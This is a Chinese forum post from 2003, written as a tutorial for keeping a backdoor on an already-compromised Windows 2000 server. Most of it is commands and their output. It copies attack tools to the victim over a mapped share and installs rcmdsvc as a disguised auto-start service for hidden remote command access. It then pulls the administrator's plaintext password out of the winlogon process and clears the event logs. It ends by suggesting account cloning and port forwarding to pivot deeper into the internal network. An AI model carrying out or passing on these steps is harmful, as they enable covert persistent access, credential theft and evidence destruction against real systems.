- 論壇徽章:
- 0
|
Win2k入侵后后門的放置
--------------------------------------------------------------------------------
作者:未知 來源:未知 日期:2003-02-07 點(diǎn)擊:36
--------------------------------------------------------------------------------
在閱讀本文之前���,假設(shè)你已經(jīng)成功入侵了某臺Win2k主機(jī)并取得
了管理員帳號����。大多數(shù)時候我們?nèi)肭帜撑_主機(jī)的目的并不是為了直接
破壞��,可以在該主機(jī)上留下后門以便自己以后可以方便的“使用”該機(jī)�。
目前一般情況下,入侵Win2k后使用最多的后門是RemoteNc了��,但
該工具有一很大的缺點(diǎn)���,容易被殺毒軟件查出����,而且如果用fport或
Active Ports等軟件也可以看到它監(jiān)聽的端口��,這很容易讓管理員發(fā)現(xiàn)。
對于Win2k下的后門推薦使用Win2k Resoruce Kit中自帶的一個小工具
rcmdsvc.exe和rcmd.exe�����,這是微軟自己出的一個用來在命令行下遠(yuǎn)程
管理主機(jī)的小工具�����。它有以下優(yōu)點(diǎn):
1�、不會被殺毒軟件認(rèn)為是病毒或后門程序,畢竟這是微軟自己出的東西��。
2����、非常隱蔽�,它開的端口是445,和Win2k系統(tǒng)的Microsoft-DS服務(wù)開的
端口一樣��,用fport或Active Ports都不能列出它正在監(jiān)聽的端口��。
下面我們來看一次實(shí)際的操作
當(dāng)然進(jìn)行以下操作之前假設(shè)已經(jīng)具有以下條件:
1���、你已經(jīng)取得了xxx.xxx.xxx.xxx的管理員權(quán)限
2���、該機(jī)啟用了tcp/ip上的Netbios支持
3�、在IP安全策略中對139和445端口未進(jìn)行屏蔽
4�、安全策略中對匿名連接的額外限制采用的是默認(rèn)的安全選項(xiàng)
/*如果后三條中有某條不能滿足,那么會讓我們的后續(xù)操作有些困難���,
不過仍然有其它辦法可以繼續(xù)�����,如果大家感興趣我會在以后的文章中說明*/
c:\\>net use z: \\\\xxx.xxx.xxx.xxx \"password\" /user:\"administrator\"
c:\\>copy rcmdsvc.exe z:\\winnt\\system32
c:\\>copy pulist.exe z:\\winnt\\system32
c:\\>copy findpass.exe z:\\winnt\\system32
c:\\>copy kill.exe z:\\winnt\\system32
c:\\>copy clearel.exe z:\\winnt\\system32
c:\\>copy clealog.cmd z:\\winnt\\system32
c:\\>copy fpipe.exe z:\\winnt\\system32
c:\\>copy msvcp60.dll z:\\winnt\\system32
/*拷貝一些常用的工具到對方服務(wù)器上��,在這里對這些工具做一個簡要說明:
rcmdsvc.exe Win2k Resource Kit中的遠(yuǎn)程命令行服務(wù)器端程序
pulist.exe 可以列出系統(tǒng)進(jìn)程和該進(jìn)程所屬用戶的工具
findpass.exe 可以在winlogon.exe進(jìn)程中查找指定用戶名的名文口令的工具
kill.exe 可以用pdi或進(jìn)程名殺掉指定進(jìn)程的工具
clearel.exe 清除系統(tǒng)��、應(yīng)用程序�����、安全日志的工具
clealog.cmd 同上
fpipe.exe 可以在命令行下做端口重定向的工具
msvcp60.dll vc的運(yùn)行庫�����,這個東西其實(shí)不是必須的���,但為了防止在某些缺少
msvcp60.dll的機(jī)上在運(yùn)行clealog清除日志時對方的機(jī)上會突然彈出一個對話
框說缺少msvcp60.dll的尷尬
情況����,最好把它一起復(fù)制過去�。*/
c:\\>sc \\\\xxx.xxx.xxx.xxx create \"Remote Command Service\" binpath=
c:\\winnt\\system32\\rcmdsvc.exe type= own start= auto
/*在這里我們用sc在目標(biāo)機(jī)xxx.xxx.xxx.xxx上創(chuàng)建了一個名為Remote Command
Service的服務(wù),啟動方式為自動�����。當(dāng)然為了隱蔽�,你最好把“Remote Command
Service”這個服務(wù)名改成其它比較類似系統(tǒng)服務(wù)的名字,畢竟管理員不可能
看著一個突然多出來的Remote Command而坐視不管�����,而且也顯的你太囂張了��。*/
/*psc.exe是Win2k Resource Kit中一個功能非常強(qiáng)大的對服務(wù)進(jìn)行控制的工具�,
詳細(xì)的使用方法可以參考本站的《sc使用完全指南》�。*/
c:\\>sc \\\\xxx.xxx.xxx.xxx start \"Remote Command Service\"
SERVICE_NAME: rpc support services
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE,NOT_PAUSABLE,
IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
/*在這里我們用sc啟動剛才創(chuàng)建的Remote Command Service服務(wù)。*/
/*下面連上對方服務(wù)器*/
c:\\>rcmd
Enter Server Name : xxx.xxx.xxx.xxx
Connect to \\\\xxx.xxx.xxx.xxx
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
C:\\Documents and Settings\\Default User.WINNT>pulist
Process PID User
Idle 0
System 8
smss.exe 168 NT AUTHORITY\\SYSTEM
csrss.exe 192 NT AUTHORITY\\SYSTEM
winlogon.exe 212 NT AUTHORITY\\SYSTEM
services.exe 240 NT AUTHORITY\\SYSTEM
lsass.exe 252 NT AUTHORITY\\SYSTEM
svchost.exe 408 NT AUTHORITY\\SYSTEM
spoolsv.exe 436 NT AUTHORITY\\SYSTEM
msdtc.exe 464 NT AUTHORITY\\SYSTEM
svchost.exe 596 NT AUTHORITY\\SYSTEM
llssrv.exe 624 NT AUTHORITY\\SYSTEM
regsvc.exe 676 NT AUTHORITY\\SYSTEM
rpcsvc.exe 692 NT AUTHORITY\\SYSTEM
mstask.exe 716 NT AUTHORITY\\SYSTEM
LSESS.EXE 792 NT AUTHORITY\\SYSTEM
tlntsvr.exe 832 NT AUTHORITY\\SYSTEM
VrUpSvr.exe 956 NT AUTHORITY\\SYSTEM
winmgmt.exe 968 NT AUTHORITY\\SYSTEM
dns.exe 980 NT AUTHORITY\\SYSTEM
dfssvc.exe 1064 NT AUTHORITY\\SYSTEM
POP3S.exe 1100 NT AUTHORITY\\SYSTEM
smtpds.exe 1120 NT AUTHORITY\\SYSTEM
svchost.exe 1384 NT AUTHORITY\\SYSTEM
dllhost.exe 1316 NT AUTHORITY\\SYSTEM
internat.exe 1308 SERVER\\Administrator
conime.exe 1680 SERVER\\Administrator
VRMONSVC.EXE 872 NT AUTHORITY\\SYSTEM
inetinfo.exe 1456 NT AUTHORITY\\SYSTEM
explorer.exe 1548 SERVER\\Administrator
cmd.exe 1712 SERVER\\Guest
pulist.exe 532 SERVER\\Guest
/*我們可以看到winlogon.exe的進(jìn)程號是212*/
C:\\Documents and Settings\\Default User.WINNT>findpass server
administrator 212
To Find Password in the Winlogon process
Usage: fidp DomainName UserName PID-of-WinLogon
The debug privilege has been added to PasswordReminder.
The WinLogon process id is 214 (0x000000d6).
To find server\\administrator password in process 214 ...
The encoded password is found at 0x01a00800 and has a length of 3.
The logon information is: server/administrator/Tgrh87fd.
The hash byte is: 0xb8.
/*在winlogon中查找administrator的名文口令*/
C:\\Documents and Settings\\Default User.WINNT>clealog
clealog done
/*清除日志記錄*/
C:\\Documents and Settings\\Default User.WINNT>
到這里我們已經(jīng)看到administrator的密碼是Tgrh87fd
至此我們拿到了管理員的密碼并安放了一個rcmdsvc的后門���,
當(dāng)然你還可以接著做許多事���。比如利用Adam發(fā)現(xiàn)的Bug再克
隆一個管理員賬號������;蛘哂胹c把對方的Tlntsvr服務(wù)啟起來�。
不過后者比較容易被發(fā)現(xiàn),不推薦����。如果你對他的內(nèi)網(wǎng)的
某臺機(jī)感興趣而且該機(jī)也有漏洞,可以用fpipe做端口重定
向后為下一步的進(jìn)攻做準(zhǔn)備���。 |
|
免費(fèi)注冊
發(fā)表于 2003-02-09 13:44
